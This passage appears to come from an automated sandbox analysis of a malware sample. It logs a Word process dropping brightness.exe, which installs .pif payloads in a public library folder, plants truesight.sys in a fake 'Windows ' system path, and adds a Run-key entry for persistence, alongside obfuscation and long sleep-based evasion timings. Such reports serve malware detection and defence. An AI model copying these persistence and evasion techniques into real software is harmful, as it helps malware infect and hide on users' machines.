          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291A917 push 0291A950h; ret 4_2_0291A948
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291A918 push 0291A950h; ret 4_2_0291A948
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291890E push 02918948h; ret 4_2_02918940
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02912EE0 push 02912F56h; ret 4_2_02912F4E
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0292BFA0 push 0292C1C8h; ret 4_2_0292C1C0
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02912FEB push 02913039h; ret 4_2_02913031
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02912FEC push 02913039h; ret 4_2_02913031
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02915DFC push ecx; mov dword ptr [esp], edx4_2_02915DFE
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_0041C40C push cs; iretd 8_2_0041C4E2
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_00423149 push eax; ret 8_2_00423179
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_0041C50E push cs; iretd 8_2_0041C4E2
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_004231C8 push eax; ret 8_2_00423179
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'iGl1TqUpTloA8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'iGl1TqUpTloA8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'iGl1TqUpTloA8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'iGl1TqUpTloA8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'iGl1TqUpTloA8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'iGl1TqUpTloA8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'iGl1TqUpTloA8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

          Persistence and Installation Behavior

          Source: C:\Windows\SysWOW64\brightness.exeFile created: C:\Users\Public\Libraries\npratlsN.pif
          Source: C:\Windows\SysWOW64\brightness.exeFile created: C:\Users\Public\Libraries\Nsltarpn.PIF
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEExecutable created and started: C:\Windows\SysWOW64\brightness.exe
          Source: C:\Windows\SysWOW64\brightness.exeFile created: C:\Windows \SysWOW64\truesight.sys
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFFile created: C:\Windows \SysWOW64\truesight.sys
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Windows\SysWOW64\brightness.exe
          Source: C:\Windows\SysWOW64\brightness.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Nsltarpn
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291A954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_0291A954
          Source: C:\Users\Public\Libraries\npratlsN.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: C:\Users\Public\Libraries\npratlsN.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pif Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pif Memory allocated: 285F0000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\npratlsN.pif Memory allocated: 28AA0000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\npratlsN.pif Memory allocated: 287A0000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\npratlsN.pif Memory allocated: 33EF0000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\npratlsN.pif Memory allocated: 34230000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\npratlsN.pif Memory allocated: 34050000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\npratlsN.pif Memory allocated: 1E9E0000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\npratlsN.pif Memory allocated: 208E0000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\npratlsN.pif Memory allocated: 20420000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\npratlsN.pif Code function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear
          Source: C:\Users\Public\Libraries\npratlsN.pif Window / User API: threadDelayed 9210
          Source: C:\Users\Public\Libraries\npratlsN.pif Window / User API: threadDelayed 633
          Source: C:\Users\Public\Libraries\npratlsN.pif Window / User API: threadDelayed 3504
          Source: C:\Users\Public\Libraries\npratlsN.pif Window / User API: threadDelayed 6281
          Source: C:\Users\Public\Libraries\npratlsN.pif Window / User API: threadDelayed 5515
          Source: C:\Users\Public\Libraries\npratlsN.pif Window / User API: threadDelayed 4320
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -597425s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -597305s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -597141s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -597002s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -596828s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -596703s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -596551s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -596429s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -596258s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -596138s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -596031s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -595913s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -595774s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -595668s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -595559s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -595450s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -595340s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -595231s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -595121s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -595012s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -594903s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -594793s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -594684s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -594564s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -594450s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -594340s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -594231s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -594121s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -594012s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -593902s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -593792s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -593684s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -593573s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -593410s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -593293s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -593184s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -593075s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -592965s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -592844s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -592731s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -592621s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -592512s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -592403s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -592286s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep count: 43 > 30
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -39660499758475511s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -600000s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 2852Thread sleep count: 5515 > 30
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -599875s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 2852Thread sleep count: 4320 > 30
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -599766s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -599641s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -599531s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -599422s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -599313s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -599188s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -599058s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -598932s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -598821s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -598653s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -598328s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -598219s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -598109s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -598000s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -597890s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -597781s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -597672s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -597563s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -597453s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -597314s >= -30000s
